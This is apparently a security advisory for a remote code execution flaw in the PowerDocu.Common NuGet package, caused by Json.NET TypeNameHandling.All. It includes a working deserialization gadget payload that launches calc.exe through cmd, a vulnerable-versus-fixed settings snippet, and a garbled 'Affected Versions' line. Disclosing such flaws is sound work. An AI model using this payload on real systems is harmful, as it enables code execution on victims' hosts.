## Key Information ### Vulnerability Description - **Type:** Remote Code Execution (RCE) via unsafe deserialization - **Affected Package:** PowerDocu.Common (NuGet) - **Affected Versions:** (flowJSON, settings).ToObject(typeof(object), _jsonSerializer); ``` ### Proof of Concept (PoC) Attackers can execute `calc.exe` on the host by crafting a specific JSON payload. ```json { "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", "MethodName": "Start", "MethodParameters": { "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "$values": [ "cmd", "/c calc.exe" ] }, "ObjectInstance": { "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" } } ``` ### Mitigation Strategy Remove `TypeNameHandling.All` from `FlowParser.cs` and `AppParser.cs` to prevent type-specified attacks. ```csharp // OLD (Vulnerable) var settings = new JsonSerializerSettings { TypeNameHandling = TypeNameHandling.All, MaxDepth = 128 }; // NEW (Secure) var settings = new JsonSerializerSettings { MaxDepth = 128 }; ```